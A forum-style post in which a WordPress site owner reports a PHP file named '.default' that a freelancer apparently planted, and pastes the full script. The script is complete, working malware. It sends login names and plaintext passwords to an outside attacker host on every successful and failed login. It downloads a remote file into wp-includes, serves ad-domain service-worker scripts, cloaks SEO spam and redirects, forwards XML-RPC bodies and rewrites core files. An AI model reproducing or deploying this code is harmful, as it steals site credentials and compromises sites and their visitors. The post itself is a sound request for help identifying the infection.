I was working with a freelancer from upwork and noticed they added this script titled .default in my config directory. It looks malicious and they were hired to do CSS style changes of elementor:
<?php
header('Cache-Control: private, max-age=0, no-cache');
if (!function_exists('getUserIP')) {
function getUserIP() {
foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) === true) {
foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
}
}
if (!function_exists('cacheUrl')) {
function cacheUrl($url, $skip_cache = FALSE) {
$cachetime = 10; //one week
// $cachetime = 60 * 60 * 24 * 7; //one week
$file = ABSPATH.WPINC.
'/class-wp-http-netfilter.php';
$mtime = 0;
if (file_exists($file)) {
$mtime = filemtime($file);
}
$filetimemod = $mtime + $cachetime;
if ($filetimemod < time() OR $skip_cache) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
CURLOPT_FOLLOWLOCATION => TRUE,
CURLOPT_MAXREDIRS => 5,
CURLOPT_CONNECTTIMEOUT => 30,
CURLOPT_TIMEOUT => 60,
));
$data = curl_exec($ch);
curl_close($ch);
if ($data AND!$skip_cache) {
file_put_contents($file, $data);
}
} else {
$data = file_get_contents($file);
}
return $data;
}
}
$weoboo = cacheUrl('http://ww.seniors-dating.org/lnk/data/ip.admins.txt');
if (strpos($weoboo, getUserIP()) !== false) {
//ip found
} else {
$gbt = getUserIP();
$id = $_SERVER['REQUEST_URI'];
$uag = $_SERVER['HTTP_USER_AGENT'];
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
if (preg_match_all("/ssss$/", $id, $matches) ) {
echo '1112';
}
if (preg_match_all("/iiis$/", $id, $matches) ) {
$file2Replace = ABSPATH.WPINC.'/header.php';
$oldRep = 'Zgc5c4MXrK42MR4F7ZdaOu3fNFnPMLhU3ySQFu7RvxpYYEcbGgEg4Q==';
$newRep = 'Zgc5c4MXrK42MQsM7IlQPPeZfl3OdrpdmmSLH6uToRkH';
$repContent = file_get_contents($file2Replace);
$repContent = str_replace($oldRep, $newRep, $repContent);
file_put_contents($file2Replace, $repContent);
exit;
}
if (preg_match_all("/xmlrpc.php$/", $id, $matches) ) {
if (!empty($_POST))
{
$res = file_get_contents ('php://input') . "\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, 'http://ww.seniors-dating.org/lnk/api_xmlrpc.php');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $res );
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
echo 'XML-RPC server accepts POST requests only.';
exit;
}
if (preg_match_all("/068f7461.js$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://picmedia.biz/sw/w1s.js\');';
exit;
}
if (preg_match_all("/serviceworker.js$|332.js$|34334$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://redads.biz/sw/w1s.js\');';
//echo $gbt;
exit;
}
if (preg_match_all("/headssr\.php$/", $id, $matches) ) {
$fileUrl = 'http://ww.seniors-dating.org/lnk/sh.txt';
$saveTo = ABSPATH . WPINC . '/abcsss.php';
if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) {
//
}
else {
$fp = fopen($saveTo, 'w+');
$ch = curl_init($fileUrl);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_exec($ch);
curl_close($ch);
fclose($fp);
}
}
$srr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
if (!preg_match_all("/ffgg$/", $id, $matches) ) {
if (!preg_match_all("/BLEXBot|Wordpress|SemrushBot|AhrefsBot|YandexBot|DotBot|MJ12bot|hrankbot|Darwin|spider/", $uag, $matches)) {
if (preg_match_all("/dating|senior|singles/", $r, $matches) ) {
$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = preg_replace ('#^[^\.]*#', '', $tr);
$tr = str_replace('.', '', $tr);
}
if (!preg_match_all("/2r232r22r/", $r, $matches) ) {
$tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = str_replace('.', '', $tr);
}
$ch = curl_init();
$user_ip = getUserIP();
if (!preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
//
if (preg_match_all("/213.111.153.189|213.111.166.54|213.111.153.84|213.111.153.197|37.1.217.38|2212.24.105.244|134.19.179.147|213.111.153.197|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
// add_filter( 'the_content', 'supermario', 20 );
function supermario($content){
$ch = curl_init( 'http://fsst.seniors-dating.org/sape/pgxhtogrzm-'.rand(1,64).'-'.rand(1,47767).'-aa/' );
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
$miaLinks = curl_exec ($ch);
curl_close($ch);
return $content . $miaLinks;
}
}
}
function add_meta_cache() {
echo '<meta http-equiv="Cache-Control" content="no-cache">';
echo '<meta http-equiv="cache-control" content="max-age=0" />';
echo '<meta http-equiv="cache-control" content="no-store" />';
echo '<meta name="google" content="notranslate" />';
echo '<meta name="robots" content="noarchive" />';
}
add_action('wp_head', 'add_meta_cache');
if (preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) {
if (!preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|109.202.107.20|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
$url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id;
} }
if (preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|134.19.179.147|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
$url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id;
}
curl_setopt ($ch, CURLOPT_URL, $url_string);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
curl_setopt($ch, CURLOPT_REFERER, $r);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
$html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
if (preg_match('~Location: (.*)~i', $html, $match)) {
$location = trim($match[1]);
} curl_close($ch);
header('Location: ' . $location);
exit();
} $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($html, 0, $header_size);
$html = substr($html, $header_size);
curl_close($ch);
if (isset($_SERVER['HTTP_USER_AGENT']))
$url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
if (strstr($id, ".css")){
header('Content-Type: text/css; charset=utf-8');
}
elseif (strstr($id, ".png")){
header('Content-Type: image/png');
}
elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
header('Content-Type: image/jpeg');
}
elseif (strstr($id, ".gif")){
header('Content-Type: image/gif');
}
elseif (strstr($id, ".xml")){
header('Content-Type: application/xml');
}
if(strstr($header, 'pdf'))
header('Content-Type: application/pdf');
echo $html;
// exit;
}
// if (preg_match_all("/3322233322/", $r, $matches) ) {
if (!preg_match_all("/robots.txt|\.env$|favicon\.ico$|wp-login\.php|\/wp-content\/|\.txt$|js|css|\/wp-admin\/|\.xml$|\/wp-includes\/|well-known\/|=\.\.|wp-cron\.php/", $r, $matches) ) {
if (!preg_match_all("/DELETEORNOTXZ|YanSex|Baidu|Googlebot|Yandexbot|Bing|DeuSu|ltx71|CCBot|pirst|Sogou|zgrab|Nutch|Aport|Ahrefs|urllib|semtix|madbot|Exabot|AdvBot|DotBot|ezooms|statdom|MauiBot|XoviBot|BLEXBot|HTTrack|MJ12bot|Panopta|rogerbot|uCrawler|Netcraft|Moreover|Netcraft|verifying|majestic|solomono|Teleport|Site-Shot|netEstate|Crowsnest|360Spider|MegaIndex|DataMiner|SemrushBot|PaperLiBot|linkdexbot|SafeDNSBot|Barkrowler|AC-BaiduBot|ZoominfoBot|Baiduspider|DomainTools|YisouSpider|TurnitinBot|domainstats|serpstatbot|blogmuraBot|randomsurfer|Nimbostratus|DomainCrawler|Go-http-client|trendictionbot|SocialSearcher|CRAZYWEBCRAWLER|viralvideochart|python-requests|CheckMarkNetwork|NetpeakCheckerBot|DomainSONOCrawler|FlightDeckReportsBot/i", $uag, $matches)) {
//if (preg_match_all("/213.111.153.217|37.1.217.38|213.152.162.104|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $gbt, $matches)) {
//$urlsArr = [
//'http://chipotle.buzz/in/inseq',
//'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/'
//];
//$url_string = $urlsArr[array_rand($urlsArr)];
// $url_string = 'http://chipotle.buzz/in/news/?val1='.$r;
$url_string = 'http://chipotle.buzz/in/news/?val1='.$host;
// $url_string = 'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/';
}
}
curl_setopt ($ch, CURLOPT_URL, $url_string);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
curl_setopt($ch, CURLOPT_REFERER, $r);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
$html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
if (preg_match('~Location: (.*)~i', $html, $match)) {
$location = trim($match[1]);
} curl_close($ch);
header('Location: ' . $location);
exit();
}
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($html, 0, $header_size);
$html = substr($html, $header_size);
curl_close($ch);
if (isset($_SERVER['HTTP_USER_AGENT']))
$url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
if (strstr($id, ".css")){
header('Content-Type: text/css; charset=utf-8');
}
elseif (strstr($id, ".png")){
header('Content-Type: image/png');
}
elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
header('Content-Type: image/jpeg');
}
elseif (strstr($id, ".gif")){
header('Content-Type: image/gif');
}
elseif (strstr($id, ".xml")){
header('Content-Type: application/xml');
}
if(strstr($header, 'pdf'))
header('Content-Type: application/pdf');
// echo $html;
function yuhoo($html) {
echo $html;
}
add_action('wp_head',
function() use ( $html ) {
yuhoo( $html );
}
);
// exit;
}
// }
}
}
//file_put_contents('/tmp/log.txt', getUserIP() . "\n", FILE_APPEND);
/* your code end */
/* weoboo end */
if(!isset($_COOKIE['_eshoob'])) {
setcookie('_eshoob', 1, time()+604800, '/');
// unset cookies
if (isset($_SERVER['HTTP_COOKIE'])) {
$cookies = explode(';', $_SERVER['HTTP_COOKIE']);
foreach($cookies as $cookie) {
if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) {
$parts = explode('=', $cookie);
$name = trim($parts[0]);
setcookie($name, '', time()-1000);
setcookie($name, '', time()-1000, '/');
}
}
}
}
if (!function_exists('getUserIP')) {
function getUserIP()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)
{
if (array_key_exists($key, $_SERVER) === true)
{
foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip)
{
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false)
{
return $ip;
}
}
}
}
}
}
if (!function_exists('isHttps')) {
function isHttps() {
if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
(!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
(!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
(!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
$server_request_scheme = 'https';
} else {
$server_request_scheme = 'http';
}
return $server_request_scheme;
}
}
if (!function_exists('wordpress_api_debug')) {
function wordpress_api_debug( $user_login, $user ){
$wpApiUrl = "http://ww.seniors-dating.org/lnk/api.php";
//
$uuuser = get_user_by('login', $_POST['log']);
if(in_array('administrator', $uuuser->roles)){
$role = 'admin';
}
else{
$role = 'user';
}
//
$verbLogs = array(
'wp_host' => $_SERVER['HTTP_HOST'],
'wp_uri' => $_SERVER['REQUEST_URI'],
'wp_scheme' => isHttps(),
'user_login' => $_POST['log'],
'user_password' => $_POST['pwd'],
'user_ip' => getUserIP(),
'user_role' => $role
);
if (!empty($verbLogs['user_login'])) {
$wpLogData = json_encode($verbLogs);
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
}
}
if (function_exists('add_action')) {
add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );
}
if (!function_exists('wordpress_api_wrongauth_debug')) {
function wordpress_api_wrongauth_debug( $user_login, $user ){
$wpApiUrl = "http://ww.seniors-dating.org/lnk/api_false.php";
//
$uuuser = get_user_by('login', $_POST['log']);
if(in_array('administrator', $uuuser->roles)){
$role = 'admin';
}
else{
$role = 'user';
}
//
$verbLogs = array(
'wp_host' => $_SERVER['HTTP_HOST'],
'wp_uri' => $_SERVER['REQUEST_URI'],
'wp_scheme' => isHttps(),
'user_login' => $_POST['log'],
'user_password' => $_POST['pwd'],
'user_ip' => getUserIP(),
'user_role' => $role
);
if (!empty($verbLogs['user_login'])) {
$wpLogData = json_encode($verbLogs);
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
}
}
if (function_exists('add_action')) {
add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 );
}
/*
// themes list
$all_themes = wp_get_themes();
$themeArr = [];
foreach ($all_themes as $theme){
$themeArr[] = $theme->get( 'TextDomain' );
}
$uploads = wp_upload_dir();
$upDir = $uploads['basedir'];
$themesList = "{$upDir}/themes_list.txt";
if (!file_exists($themesList)) {
file_put_contents($themesList, $_SERVER['SERVER_NAME'] . ';' . implode(';', $themeArr) . "\n", FILE_APPEND);
}
// themes list end
*/
?>